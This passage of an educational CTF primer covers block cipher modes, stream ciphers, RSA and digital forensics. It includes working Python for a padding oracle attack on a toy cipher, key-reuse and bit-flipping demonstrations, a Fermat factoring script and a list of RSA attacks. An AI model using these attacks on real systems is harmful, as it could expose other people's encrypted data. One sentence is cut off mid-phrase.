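print("CBC blocks equal:", cbc[0] == cbc[1])
```

Identical plaintext blocks produce identical ECB output, which is exactly what lets the outline of an image survive encryption.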
Cipher Block Chaining (CBC)
CBC is an improvement upon ECB where an Initialization Vector is used to add randomness. The encrypted previous block is used as the IV for each sequential block meaning that the encryption process cannot be parallelized. CBC has been declining in popularity due to a variety of
Note
Even though the encryption process cannot be parallelized, the decryption process can be parallelized. If the wrong IV is used for decryption it will only affect the first block as the decryption of all other blocks depends on the ciphertext not the plaintext.
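The note about a wrong IV can be checked with a toy cipher. Since the standard library ships no block cipher, this sketch uses a small 4-round Feistel network built on SHA-256 purely as an invertible stand-in; it is an assumption for illustration and not secure. All names and values are hypothetical.

```python
import hashlib

BLOCK = 16
HALF = BLOCK // 2

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:HALF]

def encrypt_block(key, block):
    left, right = block[:HALF], block[HALF:]
    for rnd in range(4):
        left, right = right, xor(left, _round(key, rnd, right))
    return left + right

def decrypt_block(key, block):
    left, right = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _round(key, rnd, left)), left
    return left + right

def cbc_encrypt(key, iv, plaintext):
    previous, out = iv, []
    for i in range(0, len(plaintext), BLOCK):
        previous = encrypt_block(key, xor(plaintext[i:i + BLOCK], previous))
        out.append(previous)
    return b"".join(out)

def cbc_decrypt(key, iv, ciphertext):
    previous, out = iv, []
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        # Only the previous *ciphertext* block is needed, so blocks are independent.
        out.append(xor(decrypt_block(key, block), previous))
        previous = block
    return b"".join(out)

key = b"hypothetical key"
good_iv, bad_iv = b"\x01" * BLOCK, b"\x02" * BLOCK
message = b"first block 0000second block 000third block 0000"

ciphertext = cbc_encrypt(key, good_iv, message)
garbled = cbc_decrypt(key, bad_iv, ciphertext)
print(garbled[:BLOCK] == message[:BLOCK], garbled[BLOCK:] == message[BLOCK:])
```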
Propagating Cipher Block Chaining (PCBC)
PCBC is a less-used cipher that modifies CBC so that decryption is also not parallelizable. It also cannot be decrypted from any point as changes made during the decryption and encryption process "propagate" throughout the blocks, meaning that both the plaintext and ciphertext are used when encrypting or decrypting as seen in the images below.
Counter (CTR)
Note
Counter mode is also known as CM, integer counter mode (ICM), and segmented integer counter (SIC)
CTR mode makes the block cipher similar to a stream cipher and it functions by adding a counter with each block in combination with a nonce and key to XOR the plaintext to produce the ciphertext. Similarly, the decryption process is the same except instead of XORing the plaintext, the ciphertext is XORed. This means that the process is parallelizable for both encryption and decryption and you can begin from anywhere as the counter for any block can be deduced easily.
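A minimal sketch of that structure. The keystream block here comes from truncated SHA-256 over key, nonce, and counter, which is a stand-in assumption for the real block cipher call, not a secure construction; the 8-byte nonce is concatenated with an 8-byte counter. All names and values are hypothetical.

```python
import hashlib

BLOCK = 16

def keystream_block(key: bytes, nonce: bytes, counter: int) -> bytes:
    """Stand-in for F(Key, nonce || counter); NOT a real block cipher."""
    counter_block = nonce + counter.to_bytes(8, "big")   # nonce high, counter low
    return hashlib.sha256(key + counter_block).digest()[:BLOCK]

def ctr_xor(key: bytes, nonce: bytes, data: bytes, first_block: int = 0) -> bytes:
    """Encrypts or decrypts: both are just an XOR with the keystream."""
    out = bytearray()
    for offset in range(0, len(data), BLOCK):
        stream = keystream_block(key, nonce, first_block + offset // BLOCK)
        out += bytes(d ^ s for d, s in zip(data[offset:offset + BLOCK], stream))
    return bytes(out)

key, nonce = b"hypothetical key", b"8bytenon"
message = b"block zero......block one.......block two......."

ciphertext = ctr_xor(key, nonce, message)
print(ctr_xor(key, nonce, ciphertext))                        # full decryption
print(ctr_xor(key, nonce, ciphertext[32:48], first_block=2))  # decrypt only block 2
```

The last call shows the random-access property: any block can be processed on its own because its counter value is known from its position.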
Security Considerations
If the nonce chosen is non-random, it is important to concatenate the nonce with the counter (high 64 bits to the nonce, low 64 bits to the counter) as adding or XORing the nonce with the counter would break security as an attacker can cause a collision with the nonce and counter. An attacker with access to providing a plaintext, nonce, and counter can then decrypt a block by using the ciphertext as seen in the decryption image.
Padding Oracle Attack
A Padding Oracle Attack sounds complex but essentially means abusing a block cipher by changing the length of input and being able to determine the plaintext.
Requirements
- An oracle, or program, which decrypts CBC-encrypted data and reveals whether the padding was valid
- Continual use of the same key
Execution
- If we have two blocks of ciphertext, C1, and C2, we can get the plaintext P2
- Since we know that CBC decryption is dependent on the prior ciphertext if we change the last byte of C1 we can see if C2 has the correct padding
- If it is correctly padded we know that the last byte of the plaintext
- If not, we can increase our byte by one and repeat until we have a successful padding
- We then repeat this for all successive bytes following C1 and if the block is 16 bytes we can expect a maximum of 4080 attempts which is trivial
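The steps above can be sketched end to end in Python. Everything here is an assumption made for illustration: the block cipher is a toy 4-round Feistel network built on SHA-256 (not AES), the padding is PKCS#7-style, and the names padding_ok and recover_block are hypothetical. The attacker code only ever calls the oracle; it never touches the key.

```python
import hashlib

BS = 16  # block size in bytes

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    # Round function of the toy Feistel cipher (an assumption, not AES)
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def enc_block(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def dec_block(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def pad(data):
    n = BS - len(data) % BS
    return data + bytes([n]) * n

def cbc_encrypt(key, iv, plaintext):
    blocks, prev = [], iv
    data = pad(plaintext)
    for i in range(0, len(data), BS):
        prev = enc_block(key, _xor(data[i:i + BS], prev))
        blocks.append(prev)
    return blocks

def padding_ok(key, prev, block):
    # The oracle: decrypts one block and reveals only whether padding is valid
    plain = _xor(dec_block(key, block), prev)
    n = plain[-1]
    return 1 <= n <= BS and plain.endswith(bytes([n]) * n)

def recover_block(oracle, c1, c2):
    inter = bytearray(BS)  # D_K(C2), filled in from the last byte backwards
    for pad_len in range(1, BS + 1):
        pos = BS - pad_len
        forged = bytearray(BS)
        for j in range(pos + 1, BS):
            forged[j] = inter[j] ^ pad_len  # force the known tail to pad_len
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), c2):
                continue
            if pad_len == 1:
                # Rule out an accidental longer padding such as 02 02
                forged[pos - 1] ^= 0xFF
                confirmed = oracle(bytes(forged), c2)
                forged[pos - 1] ^= 0xFF
                if not confirmed:
                    continue
            inter[pos] = guess ^ pad_len
            break
    return _xor(inter, c1)

key = b"server-side key!"
message = b"attack at dawn!! flag{toy}"
c1, c2 = cbc_encrypt(key, bytes(BS), message)
oracle = lambda prev, block: padding_ok(key, prev, block)
p2 = recover_block(oracle, c1, c2)
print(p2)
```

The recovered block still contains its padding bytes; stripping them gives the second half of the message.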
Stream Ciphers
A Stream Cipher is a symmetric key cipher, meaning the same key is used to encrypt and decrypt data. Stream Ciphers combine a pseudorandom sequence of bits (the keystream) with the bits of the plaintext to generate ciphertext, usually with XOR. A good way to think about Stream Ciphers is to think of them as generating one-time pads from a given state.
Definitions
- A keystream is a sequence of pseudorandom digits that extend to the length of the plaintext to uniquely encrypt each character based on the corresponding digit in the keystream
One-Time Pads
A one-time pad is an encryption mechanism whereby the entire plaintext is XOR'd with a random sequence of numbers to generate a random ciphertext. The advantage of the one-time pad is that it offers an immense amount of security, BUT for it to be useful, the randomly generated key must be as long as the message, never reused, and distributed on a separate secure channel, meaning that one-time pads have little use in modern-day cryptographic applications on the internet. Stream ciphers extend upon this idea by using a key, usually 128-bit in length, to seed a pseudorandom keystream which is used to encrypt the text.
Types of Stream Ciphers
Synchronous Stream Ciphers
A Synchronous Stream Cipher generates a keystream based on internal states not related to the plaintext or ciphertext. This means that the stream is generated pseudorandomly outside of the context of what is being encrypted. A binary additive stream cipher is the term used for a stream cipher which XORs the bits of the keystream with the bits of the plaintext. Encryption and decryption require that the synchronous stream cipher is in the same state; otherwise, the message cannot be decrypted.
Self-synchronizing Stream Ciphers
A Self-synchronizing Stream Cipher, also known as an asynchronous stream cipher or ciphertext autokey (CTAK), is a stream cipher that uses the previous N ciphertext digits to compute the keystream used for the next digits.
Note
Seems a lot like block ciphers, doesn't it? That's because cipher feedback (CFB) mode, a block cipher mode, is an example of a self-synchronizing stream cipher.
Stream Cipher Vulnerabilities
Key Reuse
The key tenet of using stream ciphers securely is to NEVER repeat key use, because XOR is its own inverse and a repeated keystream cancels out. If P1 and P2 have both been XOR'd with the same keystream K to give C1 and C2, then C1 XOR C2 = P1 XOR P2, with K eliminated entirely. When both plaintexts are English text, cryptanalysis tools such as character frequency analysis work well on that XOR due to the low entropy of the English language, and once either plaintext is known, retrieving K is trivial because K = C1 XOR P1.
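A minimal sketch of why reuse is fatal, using a made-up 12-byte keystream and two made-up messages (all values here are assumptions for the demonstration):

```python
def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Hypothetical keystream, reused for two messages of the same length
keystream = bytes.fromhex("8f3a1c77e209b45d6a10c3f8")
p1 = b"attack at 9!"
p2 = b"retreat now!"
c1 = xor_bytes(p1, keystream)
c2 = xor_bytes(p2, keystream)

# The keystream cancels out: the attacker learns P1 XOR P2 from ciphertexts alone.
leak = xor_bytes(c1, c2)

# If the attacker knows or guesses P1, both P2 and the keystream fall out.
recovered_p2 = xor_bytes(leak, p1)
recovered_keystream = xor_bytes(c1, p1)
print(recovered_p2)
```

In a real challenge P1 is usually not known outright, so the same XOR is attacked with crib dragging or frequency analysis instead.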
Bit-flipping Attack
Another key tenet of using stream ciphers securely is considering that just because a message has been decrypted, it does not mean the message has not been tampered with. Because each ciphertext bit maps directly onto one plaintext bit, an attacker who knows the layout of the plaintext can act as a Man in the Middle (MITM) and flip bits of the ciphertext in transit to produce a predictable change in the decrypted plaintext. If a ciphertext decrypts to 'Transfer $1000', then a middleman can flip a single bit for the ciphertext to decrypt to 'Transfer $9000', because changing a single character in the ciphertext does not affect the state in a synchronous stream cipher.
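The 'Transfer $1000' example can be reproduced with a toy synchronous stream cipher. The keystream generator below (SHA-256 over key and counter) is an assumption chosen only to keep the sketch self-contained; the attack works the same way against any XOR-based stream cipher without integrity protection.

```python
import hashlib

def keystream(key: bytes, n: int) -> bytes:
    # Toy keystream generator: SHA-256 over key and a counter (demo assumption)
    out, counter = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def xor_stream(key: bytes, data: bytes) -> bytes:
    # Encrypts or decrypts, since XOR with the same keystream undoes itself
    return bytes(d ^ k for d, k in zip(data, keystream(key, len(data))))

key = b"shared secret"
ciphertext = xor_stream(key, b"Transfer $1000")

# The attacker never sees the key, but knows byte 10 holds the first digit.
tampered = bytearray(ciphertext)
tampered[10] ^= ord("1") ^ ord("9")  # 0x31 ^ 0x39 == 0x08, a single bit

result = xor_stream(key, bytes(tampered))
print(result)
```

The receiver decrypts without any error, which is why stream ciphers are normally paired with a message authentication code.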
RSA
RSA, which is an abbreviation of its authors' names (Rivest–Shamir–Adleman), is a cryptosystem that allows for asymmetric encryption. Asymmetric cryptosystems are also commonly referred to as Public Key Cryptography, where a public key is used to encrypt data and only a secret private key can be used to decrypt the data.
Definitions
- The Public Key is made up of (n, e)
- The Private Key is made up of (n, d)
- The message is represented as m and is converted into a number
- The encrypted message or ciphertext is represented by c
- p and q are prime numbers which make up n
- e is the public exponent
- n is the modulus and its length in bits is the bit length (e.g. 1024-bit RSA)
- d is the private exponent
- The totient λ(n) is used to compute d and is equal to the lcm(p-1, q-1), another definition for λ(n) is that λ(pq) = lcm(λ(p), λ(q))
What makes RSA viable?
If the public n, public e, and private d are chosen appropriately (in practice they are all very large numbers) and a message m satisfies 0 < m < n, then we can say:
(m^e)^d ≡ m (mod n)
Note
The triple equals sign in this case refers to modular congruence, which here means that there exists an integer k such that (m^e)^d = kn + m
RSA is viable because it is incredibly hard to find d even with m, n, and e: the known ways of doing so are as hard as factoring n, and factoring large numbers is an arduous process.
Implementation
RSA follows 3 steps to be implemented: 1. Key Generation 2. Encryption 3. Decryption
Key Generation
We are going to follow Wikipedia's small numbers example to make this idea a bit easier to understand.
Note
In this example, we are using Carmichael's totient function where λ(n) = lcm(λ(p), λ(q)), but Euler's totient function is perfectly valid to use with RSA. Euler's totient is φ(n) = (p − 1)(q − 1)
- Choose two prime numbers such as:
- p = 61 and q = 53
- Find n:
- n = pq = 3233
- Calculate λ(n) = lcm(p-1, q-1)
- λ(3233) = lcm(60, 52) = 780
- Choose a public exponent e such that 1 < e < λ(n) and e is coprime to λ(n) (it shares no common factor with λ(n) other than 1). The standard in most cases is 65537, but we will be using:
- e = 17
- Calculate d as the modular multiplicative inverse of e modulo λ(n), or in English, find d such that:
de mod λ(n) = 1
- d * 17 mod 780 = 1
- d = 413
Now we have a public key of (3233, 17) and a private key of (3233, 413)
Encryption
With the public key, m can be encrypted trivially
The ciphertext is equal to m**e mod n or:
c = m^17 mod 3233
Decryption
With the private key, m can be decrypted trivially as well
The plaintext is equal to c**d mod n or:
m = c^413 mod 3233
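The whole small-numbers walkthrough fits in a few lines of Python. This is a sketch for checking the arithmetic only: the message value m = 65 is an arbitrary choice for the demonstration, there is no padding, and pow(e, -1, lam) needs Python 3.8 or newer.

```python
from math import gcd

# Key generation with the small primes from the example
p, q = 61, 53
n = p * q                                       # 3233
lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)    # lcm(60, 52) = 780
e = 17
assert gcd(e, lam) == 1                         # e must be coprime to lambda(n)
d = pow(e, -1, lam)                             # modular inverse of e, here 413

# Encryption with the public key (n, e)
m = 65                                          # arbitrary demo message, 0 < m < n
c = pow(m, e, n)

# Decryption with the private key (n, d)
decrypted = pow(c, d, n)
print(n, lam, d, c, decrypted)
```

Three-argument pow performs modular exponentiation efficiently, which is what makes encryption and decryption "trivial" even for very large exponents.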
Exploitation
From the RsaCtfTool README
Attacks:
- Weak public key factorization
- Wiener's attack
- Hastad's attack (Small public exponent attack)
- Small q (q < 100,000)
- Common factor between ciphertext and modulus attack
- Fermat's factorization for close p and q
- Gimmicky Primes method
- Past CTF Primes method
- Self-Initializing Quadratic Sieve (SIQS) using Yafu
- Common factor attacks across multiple keys
- Small fractions method when p/q is close to a small fraction
- Boneh Durfee Method when the private exponent d is too small compared to the modulus (i.e d < n^0.292)
- Elliptic Curve Method
- Pollards p-1 for relatively smooth numbers
- Mersenne primes factorization
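As one illustration of the list above, Fermat's factorization for close p and q can be sketched as follows. This is a from-scratch toy, not RsaCtfTool's implementation; the function name fermat_factor is hypothetical, and the modulus and exponent are the small-numbers key used earlier (3233, 17).

```python
from math import gcd, isqrt

def fermat_factor(n):
    # Assumes n is odd and composite. Searches for a, b with n = a^2 - b^2,
    # which is fast when the two prime factors are close together.
    a = isqrt(n)
    if a * a < n:
        a += 1
    while True:
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1

n, e = 3233, 17
p, q = fermat_factor(n)

# With p and q known, the private exponent follows exactly as in key generation.
lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)
d = pow(e, -1, lam)
print(p, q, d)
```

For this modulus the search succeeds on the first candidate (a = 57, b = 4), which is why primes that are too close together make a weak key.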
Forensics
https://ctf101.org/forensics
Forensics is the art of recovering the digital trail left on a computer. There are plenty of methods to find data that is seemingly deleted, not stored, or worse, covertly recorded.
An important part of Forensics is having the right tools, as well as being familiar with the following topics:
- File Formats
- EXIF data
- Wireshark & PCAPs
- What is Wireshark
- Steganography
- Disk Imaging
File Formats
File Extensions are not the sole way to identify the type of a file. Files have certain leading bytes called file signatures which allow programs to parse the data consistently. Files can also contain additional "hidden" data called metadata, which can be useful in finding out information about the context of a file's data.
File Signatures
File signatures (also known as File Magic Numbers) are bytes within a file used to identify the format of the file. Generally, they’re 2-4 bytes long, found at the beginning of a file.
What is it used for?
Files can sometimes come without an extension, or with incorrect ones. We use file signature analysis to identify the format (file type) of the file. Programs need to know the file type to open properly.
How do you find the file signature?
You need to be able to look at the binary data that constitutes the file you’re examining. To do this, you’ll use a hexadecimal editor. Once you find the file signature, you can check it against file signature repositories such as Gary Kessler’s.
Example
The file above, when opened in a Hex Editor, begins with the bytes FFD8FFE0 00104A46 494600, or in ASCII ˇÿˇ‡ JFIF, where \x00 and \x10 lack symbols.
Searching in Gary Kessler’s database shows that this file signature belongs to a JPEG/JFIF graphics file, exactly what we suspect.
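The same lookup can be scripted. The sketch below checks a file's leading bytes against a tiny hand-picked table; the table is an assumption for illustration and is nowhere near as complete as a real signature repository, and the function names are hypothetical.

```python
# A few well-known signatures; a real repository lists hundreds.
SIGNATURES = {
    bytes.fromhex("FFD8FF"): "JPEG image",
    bytes.fromhex("89504E470D0A1A0A"): "PNG image",
    b"GIF87a": "GIF image",
    b"GIF89a": "GIF image",
    b"%PDF": "PDF document",
    b"PK\x03\x04": "ZIP archive",
}

def identify(header: bytes) -> str:
    # Compare the leading bytes against each known signature
    for magic, name in SIGNATURES.items():
        if header.startswith(magic):
            return name
    return "unknown"

def identify_file(path: str) -> str:
    # Only the first few bytes are needed, whatever the extension says
    with open(path, "rb") as f:
        return identify(f.read(16))

# The leading bytes from the example above
header = bytes.fromhex("FFD8FFE000104A46494600")
print(identify(header), header[6:10])
```

On Linux and macOS, the file command performs the same kind of check against a much larger database.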
Metadata
Metadata is data about data. Different types of files have different metadata. The metadata on a photo could include dates, camera information, GPS location, comments, etc. For music, it could include the title, author, track number, and album.
What kind of file metadata is useful?
Potentially, any file metadata you can find could be useful.
How do I find it?
EXIF Data is metadata attached to photos which can include location, time, and device information.
One of our favorite tools is ExifTool, which displays metadata for an input file, including:
- File size
- Dimensions (width and height)
- File type
- Programs used to create (e.g. Photoshop)
- OS used to create (e.g. Apple)
Run command line: exiftool(-k).exe [filename] and you should see something like this:
Example
Let's take a look at File A's metadata with ExifTool:
File type
Image description
Make and camera info
GPS Latitude/Longitude
Timestamps
Timestamps are data that indicate the time of certain events (MAC):
- Modification: when a file was modified
- Access: when a file or entries were read or accessed
- Creation: when files or entries were created
Types of timestamps
- Modified
- Accessed
- Created
- Date Changed (MFT)
- Filename Date Created (MFT)
- Filename Date Modified (MFT)
- Filename Date Accessed (MFT)
- INDX Entry Date Created
- INDX Entry Date Modified
- INDX Entry Date Accessed
- INDX Entry Date Changed
Why do we care?
Certain events such as creating, moving, copying, opening, editing, etc. might affect the MAC times. If the MAC timestamps can be obtained, a timeline of events can be reconstructed.
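On a live file system (as opposed to a forensic image), the basic MAC times can be read with Python's os.stat. This is a minimal sketch; the function name mac_times is made up, and note that st_ctime means creation time on Windows but metadata-change time on Unix-like systems, so the third value has to be interpreted per platform.

```python
import os
from datetime import datetime, timezone

def mac_times(path):
    st = os.stat(path)

    def to_utc(ts):
        return datetime.fromtimestamp(ts, tz=timezone.utc)

    return {
        "modified": to_utc(st.st_mtime),
        "accessed": to_utc(st.st_atime),
        # Creation time on Windows, metadata-change time on Unix
        "changed_or_created": to_utc(st.st_ctime),
    }

# Example: timestamps of the current directory
for name, when in mac_times(".").items():
    print(f"{name:>20}: {when.isoformat()}")
```

Reading a file this way can itself update its access time, which is one reason forensic work is done on an image rather than the original media.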
Timeline Patterns
There are plenty more patterns than the ones introduced below, but these are the basics you should start with to get a good understanding of how it works, and to complete this challenge.
Examples
We know that the BMP files fileA and fileD are the same, but that the JPEG files fileB and fileC are different somehow. So how can we find out what went on with these files?
By using timestamp information from the file system, we can learn that the BMP fileD was the original file, with fileA being a copy of the original. Afterward, fileB was created by modifying fileA, and fileC was created by modifying fileA differently.
Follow along as we demonstrate.
We’ll start by analyzing images in AccessData FTK Imager, where there’s a Properties window that shows you some information about the file or folder you’ve selected.
Here are the extracted MAC times for fileA, fileB, fileC, and fileD. Note that AccessData FTK Imager assumes that the file times on the drive are in UTC (Coordinated Universal Time). I subtracted four hours since the USB was set up in Eastern Time (UTC-4 during daylight saving time). This isn’t necessary, but it helps me understand the times a bit better.
Highlight timestamps that are the same. If timestamps are off by a few seconds, they should be counted as the same. This lets you see a clear difference between different timestamps. Then, highlight oldest to newest to help put them in order.
Identify timestamp patterns.
Wireshark
Wireshark is a network protocol analyzer that is often used in CTF challenges to look at recorded network traffic. Wireshark uses a file type called PCAP to record traffic. PCAPs are often distributed in CTF challenges to provide recorded traffic history.
Interface
Upon opening Wireshark, you are greeted with the option to open a PCAP or begin capturing network traffic on your device.
The network traffic displayed initially shows the packets in the order in which they were captured. You can filter packets by protocol, source IP address, destination IP address, length, etc.
To apply filters, simply enter the constraining factor, for example, 'http', in the display filter bar.
Filters can be chained together using the '&&' notation. To filter by IP, ensure a double equals '==' is used.
The most pertinent part of a packet is its data payload and protocol information.
Decrypting SSL Traffic
By default, Wireshark cannot decrypt SSL traffic on your device unless you give it the relevant key material, such as the server's private key or the session secrets.
High-Level SSL Handshake Overview
For a network session to be encrypted properly, the client and server must share a common secret that they can use to encrypt and decrypt data without someone in the middle being able to guess. The SSL Handshake loosely follows this format:
- The client sends a list of available cipher suites it can use along with a random set of bytes referred to as client_random
- The server sends back the cipher suite that will be used, such as TLS_DHE_RSA_WITH_AES_128_CBC_SHA, along with a random set of bytes referred to as server_random
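- The client generates a pre-master secret, encrypts it with the server's public key (when RSA key exchange is used), then sends it to the server.
- The server and client then each derive a common master secret from the pre-master secret and the two random values, as defined by the selected cipher suite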
- The client and server begin communicating using this common secret
Decryption Requirements
There are several ways to be able to decrypt traffic.
- If you have the client and server random values and the pre-master secret, the master secret can be generated and used to decrypt the traffic
- If you have the master secret, traffic can be decrypted easily
- If the cipher-suite uses RSA, you can factor n in the key to break the encryption on the encrypted pre-master secret and generate the master secret with the client and server randoms
Steganography
Steganography is the practice of hiding data in plain sight. The hidden data is often embedded in images or audio.
You could send a picture of a cat to a friend and hide text inside. Looking at the image, there’s nothing to make anyone think there’s a message hidden inside it.
You could also hide a second image inside the first.
Steganography Detection
So we can hide text and an image. How do we find out if there is hidden data?
FileA and FileD appear the same, but they’re different. Also, FileD was modified after it was copied, so it’s possible there might be steganography in it.
FileB and FileC don’t appear to have been modified after being created. That doesn’t rule out the possibility that there’s steganography in them, but you’re more likely to find it in fileD. This brings up two questions:
- Can we determine that there is steganography in fileD?
- If there is, what was hidden in it?
LSB Steganography
Files are made of bytes. Each byte is composed of eight bits.
Changing the least-significant bit (LSB) doesn’t change the value very much.
So we can modify the LSB without changing the file noticeably. By doing so, we can hide a message inside.
LSB Steganography in Images
LSB Steganography or Least Significant Bit Steganography is a method of steganography where data is recorded in the lowest bit of a byte.
Say an image has a pixel with an RGB value of (255, 255, 255). The bits of each of those values will look like
1 | 1 | 1 | 1 | 1 | 1 | 1 | 1
By modifying the lowest, or least significant, bit, we can use the 1-bit space across every RGB value for every pixel to construct a message.
1 | 1 | 1 | 1 | 1 | 1 | 1 | 0
The reason steganography is hard to detect by sight is that a 1-bit difference in color is insignificant as seen below.
Example
Let’s say we have an image, and part of it contains the following binary:
And let’s say we want to hide the character y inside.
First, we need to convert the hidden message to binary.
Now we take each bit from the hidden message and replace the LSB of the corresponding byte with it, repeating this for each of the eight bits of the character.
Decoding LSB steganography is exactly the same as encoding, but in reverse. For each byte, grab the LSB and add it to your decoded message. Once you’ve gone through each byte, convert all the LSBs you grabbed into text or a file. (You can use your file signature knowledge here!)
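Both directions can be sketched on raw bytes. The example below hides the character y in eight cover bytes; the cover values (eight bytes of 255) and the function names embed and extract are assumptions for illustration, and a real image would first need to be decoded into its pixel bytes.

```python
def embed(cover: bytes, message: bytes) -> bytes:
    # Message bits, most significant bit of each byte first
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("cover is too small for the message")
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit  # clear the LSB, then set it to the bit
    return bytes(out)

def extract(stego: bytes, n_bytes: int) -> bytes:
    out = bytearray()
    for i in range(n_bytes):
        value = 0
        for b in stego[i * 8:(i + 1) * 8]:
            value = (value << 1) | (b & 1)  # collect one LSB per cover byte
        out.append(value)
    return bytes(out)

cover = bytes([255] * 8)
stego = embed(cover, b"y")       # 'y' is 0x79, binary 01111001
print(list(stego))               # [254, 255, 255, 255, 255, 254, 254, 255]
print(extract(stego, 1))         # b'y'
```

No cover byte changes by more than 1, which is why the altered pixels are indistinguishable by eye.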
What other types of steganography are there?
Steganography is hard for the defense side because there’s practically an infinite number of ways it could be carried out. Here are a few examples:
- LSB steganography: different bits, different bit combinations
- Encode in every certain number of bytes
- Use a password
- Hide in different places
- Use encryption on top of steganography
Disk Imaging
A forensic image is an electronic copy of a drive (e.g. a hard drive, USB, etc.). It’s a bit-by-bit or bitstream file that’s an exact, unaltered copy of the media being duplicated.
Wikipedia said that the most straightforward disk imaging method is to read a disk from start to finish and write the data to a forensics image format. “This can be a time-consuming process, especially for disks with a large capacity,” Wikipedia said.
To prevent write access to the disk, you can use a write blocker. It’s also common to calculate a cryptographic hash of the entire disk when imaging it. “Commonly-used cryptographic hashes are MD5, SHA1, and/or SHA256,” said Wikipedia. “By recalculating the integrity hash at a later time, one can determine if the data in the disk image has been changed. This by itself does not protect against intentional tampering, but it can indicate that the data was altered, e.g. due to corruption.”
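Computing the integrity hash of an image can be sketched with Python's hashlib. The function names hash_stream and hash_image are made up for this example; reading in chunks keeps memory use flat even for very large images.

```python
import hashlib
import io

def hash_stream(stream, algorithm="sha256", chunk_size=1 << 20):
    # Feed the data to the hash in chunks so large images need little memory
    h = hashlib.new(algorithm)
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        h.update(chunk)
    return h.hexdigest()

def hash_image(path, algorithm="sha256"):
    with open(path, "rb") as f:
        return hash_stream(f, algorithm)

# Demonstration on in-memory data standing in for an image file
original = hash_stream(io.BytesIO(b"abc"))
altered = hash_stream(io.BytesIO(b"abd"))
print(original)
print(original == altered)  # False: any change produces a different hash
```

Recording the hash at acquisition time and recomputing it later with hash_image is enough to show whether the image has changed in between.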
Why image a disk? Forensic imaging:
- Prevents tampering with the original data evidence
- Allows you to play around with the copy, without worrying about messing up the original
Forensic Image Extraction Example
This example uses the tool AccessData FTK Imager.
Step 1: Go to File > Create Disk Image
Step 2: Select Physical Drive, because the USB or hard drive you’re imaging is a physical device or drive.
Step 3: Select the drive you’re imaging. The 1000 GB is my computer hard drive; the 128 MB is the USB that I want to image.
Step 4: Add a new image destination
Step 5: Select whichever image type you want. Choose Raw (dd) if you’re a beginner, since it’s the most common type
Step 6: Fill in all the evidence information
Step 7: Choose where you want to store it
Step 8: The image destination has been added. Now you can start the image extraction
Step 9: Wait for the image to be extracted
Step 10: This is the completed extraction
Step 11: Add the image you just created so that you can view it
Step 12: This time, choose the image file, since that’s what you just created
Step 13: Enter the path of the image you just created
Step 14: View the image.
- Evidence tree: Structure of the drive image
- File list: List of all the files in the drive image folder
- Properties: Properties of the file/folder being examined
- Hex viewer: View of the drive/folders/files in hexadecimal
Step 15: To view files in the USB, go to Partition 1 > [USB name] > [root] in the Evidence Tree and look in the File List
Step 16: Selecting fileA, fileB, fileC, or fileD gives us some properties of the files & a preview of each photo
Step 17: Extract files of interest for further analysis by selecting, right-clicking, and choosing Export Files
Memory Forensics
There are plenty of traces of someone's activity on a computer, but perhaps some of the most valuable information can be found within memory dumps, that is, images taken of RAM. These dumps of data are often very large but can be analyzed using a tool called Volatility.
Volatility Basics
Memory forensics isn't all that complicated; the hardest part is using your toolset correctly. A good workflow is as follows:
- Run strings for clues
- Identify the image profile (which OS, version, etc.)
- Dump processes and look for suspicious processes
- Dump data related to interesting processes
- View data in a format relating to the process (Word: docx, Notepad: txt, Photoshop: psd, etc.)
Profile Identification
To properly use Volatility you must supply a profile with --profile=PROFILE, therefore before any sleuthing, you need to determine the profile using imageinfo:
$ python vol.py -f ~/image.raw imageinfo
Volatility Foundation Volatility Framework 2.4
Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64
AS Layer1 : AMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/Users/Michael/Desktop/win7_trial_64bit.raw)
PAE type : PAE
DTB : 0x187000L
KDBG : 0xf80002803070
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff80002804d00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2012-02-22 11:29:02 UTC+0000
Image local date and time : 2012-02-22 03:29:02 -0800
Dump Processes
To view processes, the pslist, pstree, or psscan command can be used.
$ python vol.py -f ~/image.raw --profile=Win7SP0x64 pslist
Volatility Foundation Volatility Framework 2.5
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffa0ee12532180 System 4 0 108 0 ------ 0 2018-04-22 20:02:33 UTC+0000
0xffffa0ee1389d040 smss.exe 232 4 3 0 ------ 0 2018-04-22 20:02:33 UTC+0000
...
0xffffa0ee128c6780 VBoxTray.exe 3324 1123 10 0 1 0 2018-04-22 20:02:55 UTC+0000
0xffffa0ee14108780 OneDrive.exe 1422 1123 10 0 1 1 2018-04-22 20:02:55 UTC+0000
0xffffa0ee14ade080 svchost.exe 228 121 1 0 1 0 2018-04-22 20:14:43 UTC+0000
0xffffa0ee1122b080 notepad.exe 2019 1123 1 0 1 0 2018-04-22 20:14:49 UTC+0000
Process Memory Dump
Dumping the memory of a process can prove to be fruitful, say we want to dump the data from notepad.exe:
